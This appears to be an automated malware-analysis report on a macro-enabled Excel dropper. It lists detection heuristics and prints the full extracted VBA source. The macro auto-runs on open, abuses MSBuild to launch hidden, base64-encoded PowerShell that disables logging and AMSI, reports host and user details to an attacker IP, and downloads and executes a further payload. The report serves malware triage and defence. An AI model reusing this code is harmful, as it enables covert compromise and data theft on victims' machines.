MALICIOUS
372
Risk Score
Heuristics 10
-
ClamAV: Xls.Dropper.Agent-7132023-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7132023-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set objShell = CreateObject("WScript.Shell") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objShell = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/developer/msbuild/2003 In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8595 bytes |
SHA-256: 2f40ef2e16c1a57241248287ee297a5a6acc59c31cca184bfc058b3598b616b9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Sub mksrw()
Set objShell = CreateObject("WScript.Shell")
Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim StrFldSearch
StrFldSearch = "C:\Windows\Microsoft.NET\Framework64"
Set RootFolder = oFSO.GetFolder(StrFldSearch)
Set SubFolder = RootFolder.SubFolders
Dim np
For Each folder In SubFolder
strFolder = StrFldSearch & "\" & folder.Name & "\MSBuild.exe"
If oFSO.FileExists(strFolder) Then
np = StrFldSearch & "\" & folder.Name & "\"
End If
Next
Dim fp
fp = objShell.ExpandEnvironmentStrings("%TMP%\tfi.xml")
Dim b1, b2, b3, b4, b5
b1 = "SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBlAFIAUwBJAG8ATgAuAE0AYQBKAE8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAGwAeQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAEEAbABVAGUAKAAkAE4AVQBMAEwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBj"
b2 = "AGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAE8AbABsAEUAQwBUAGkAbwBuAFMALgBHAEUATgBlAHIASQBjAC4ARABpAGMAVABJAG8AbgBhAHIAWQBbAFMAVAByAEkATgBHACwAUwBZAFMAdABFAG0ALgBPAGIASgBlAGMAdABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAVgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEAbAB9AEUATABTAGUAewBbAFMAYwBSAEkAcAB0AEIAbABvAEMAawBdAC4AIgBHAEUAdABGAEkAZQBgAGwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAEwAdQBFACgAJABOAHUA"
b3 = "TABsACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBPAEwATABlAEMAVABJAE8AbgBzAC4ARwBFAE4ARQBSAGkAYwAuAEgAQQBzAEgAUwBFAFQAWwBzAFQAcgBpAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAEUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAFQARgBJAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAG4AdQBsAGwALAAkAFQAcgB1AGUAKQB9ADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAdAAuAFMAZQBSAHYAaQBDAEUAUABPAGkAbgBUAE0AYQBOAEEAZwBlAFIAXQA6ADoARQBYAHAARQBjAHQAMQAwADAAQwBvAG4AVABJAE4AVQBFAD0AMAA7ACQAdwBDAD0ATgBlAFcALQBPAGIASgBFAEMAVAAgAFMAeQBTAFQARQBtAC4ATgBFAFQALgBXAGUAQgBDAEwASQBlAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBl"
b4 = "ACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBhAGQAZQByAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAUgBPAFgAWQA9AFsAUwBZAFMAdABFAE0ALgBOAEUAdAAuAFcARQBCAFIARQBxAFUARQBTAFQAXQA6ADoARABFAGYAYQBVAGwAVABXAEUAQgBQAHIAbwBYAFkAOwAkAFcAQwAuAFAAcgBvAHgAWQAuAEMAUgBlAEQARQBOAHQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQARQBtAC4ATgBFAHQALgBDAFIAZQBkAGUATgB0AEkAYQBMAEMAQQBjAEgARQBdADoAOgBEAEUARgBBAFUAbABUAE4ARQB0AHcAbwBSAGsAQwByAEUARABlAG4AVABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBuAEMAbwBEAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAcwAoACcAZAA2ADgAYQBiAGQANQA4ADEAMwA5ADcAZQBlADMAMgA3ADgAOAAyADEAOABmAGEANwAzADgAZAA3AGUAYwAwACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMA"
b5 = "WwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8ANQA0AC4AMwA3AC4AMQAzADYALgAyADEAMQA6ADQANAAzACcAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkAHcAYwAuAEgARQBBAGQAZQByAFMALgBBAEQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHYAcABBAG8ATABrAG0AcQA0AHMAawArAG4AaABEAGEASQBCAGkAcgBCAGEAdQBuAHoAYwBJAD0AIgApADsAJABEAEEAVABhAD0AJABXAEMALgBEAE8AVwBOAGwATwBhAEQARABhAFQAYQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAGEAdABBAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEAdABBAC4AbABlAG4AZwBUAEgAXQA7AC0AagBvAGkATgBbAEMASABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA="
Set fl = CreateObject("Scripting.FileSystemObject")
Set File = fl.CreateTextFile(fp, True)
Dim c1
c1 = "JABlAD0AIgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQA9ACIAKwAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAKwAiAGAAIgAmAGAAIgBIAE8ATQBFAFAAQQBUAEgAPQAiACsAJABlAG4AdgA6AEgATwBNAEUAUABBAFQASAArACIAYAAiACYAYAAiAEwATwBHAE8ATgBTAEUAUgBWAEUAUgA9ACIAKwAkAGUAbgB2ADoATABPAEcATwBOAFMARQBSAFYARQBSACsAIgBgACIAJgBgACIATwBTAD0AIgArACQAZQBuAHYAOgBPAFMAKwAiAGAAIgAmAGAAIgBVAFMARQBSAEQATgBTAEQATwBNAEEASQBOAD0AIgArACQAZQBuAHYAOgBVAFMARQBSAEQATgBTAEQATwBNAEEASQBOACsAIgBgACIAJgBgACIAVQBTAEUAUgBEAE8ATQBBAEkATgA9ACIAKwAkAGUAbgB2ADoAVQBTAEUAUgBEAE8ATQBBAEkATgArACIAYAAiACYAYAAiAFUAUwBFAFIATgBBAE0ARQA9ACIAKwAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAoACIAaAB0AHQAcAA6AC8ALwA1ADQALgAzADcALgAxADMANgAuADIAMQAxAC8AbQBhAHIAawBlAHIALgBoAHQAbQBsAD8AIgArACQAZQApAA=="
Dim a1, a2, a3, a4
a1 = "<Project ToolsVersion=""4.0"" xmlns=""http://schemas.microsoft.com/developer/msbuild/2003""><Target Name=""34rfas""><QWEridxnaPO /></Target><UsingTask TaskName=""QWEridxnaPO"" TaskFactory=""CodeTaskFactory"" AssemblyFile=""C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"" ><Task><Reference Include=""System.Management.Automation"" /><Code Type=""Class"" Language=""cs""><![CDATA[ using System;using System.IO;using System.Diagnostics;using System.Reflection;using System.Runtime.InteropServices;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Text;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class QWEridxnaPO : Task, ITask {public override bool Execute() {"
a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
a3 = "ProcessStartInfo startInfo = new ProcessStartInfo(""powershell.exe"");startInfo.WindowStyle = ProcessWindowStyle.Minimized;startInfo.Arguments = ""-noP -sta -w 1 -enc " & b1 & b2 & b3 & b4 & b5 & """;Process.Start(startInfo);"
a4 = "return true;}}]]></Code></Task></UsingTask></Project>"
File.Write a1 & a2 & a3 & a4
File.Close
objShell.Run (np & "MSBuild.exe" & " " & fp)
Sleep (2000)
fl.DeleteFile (fp)
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
mksrw
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 28672 bytes |
SHA-256: 1717dbde530376e4acc9427bc3e26dbc81015c6c881befe4fca1667452f55675 |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-7132023-0
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.